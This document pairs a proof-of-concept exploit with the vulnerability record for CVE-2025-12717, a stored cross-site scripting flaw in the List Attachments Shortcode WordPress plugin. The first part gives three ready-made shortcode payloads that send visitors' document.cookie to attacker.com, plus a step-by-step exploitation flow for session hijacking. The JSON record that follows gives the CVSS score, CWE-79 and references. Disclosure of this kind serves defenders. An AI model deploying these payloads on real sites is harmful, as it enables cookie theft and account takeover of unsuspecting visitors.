CVE-2025-12717

WordPress Stored XSS PoC - List Attachments Shortcode // Attacker with Author+ role creates/edits a post and inserts this shortcode: [list-attachments before_list='<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>'] // Alternative PoC using event handler (bypasses some filters): [list-attachments before_list='<img src=x onerror="fetch(\'https://attacker.com/log?data=\'+btoa(document.cookie))">'] // More sophisticated payload for session hijacking: [list-attachments before_list='<script>document.body.innerHTML+="<img src=https://attacker.com/log?cookie="+encodeURIComponent(document.cookie)+">";</script>'] // When any user visits the page containing this shortcode, the XSS payload executes // Exploitation flow: 1. Attacker logs into WordPress with Author+ account 2. Creates new post or edits existing post 3. Inserts malicious shortcode in post content 4. Publishes/saves the post 5. Malicious script stored in database (persistent) 6. Victim visits the affected page 7. XSS payload executes in victim's browser

{"cve": {"id": "CVE-2025-12717", "sourceIdentifier": "[email protected]", "published": "2025-12-06T06:15:50.563", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The List Attachments Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'before_list' parameter in the [list-attachments] shortcode in all versions up to, and including, 0.4.1a due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/list-attachments-shortcode/tags/0.6a/class-list-attachments-shortcode.php#L47", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/list-attachments-shortcode/tags/0.6a/class-list-attachments-shortcode.php#L85", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a67b4ec2-b337-478f-aaaa-2ce19c4deb4c?source=cve", "source": "[email protected]"}]}}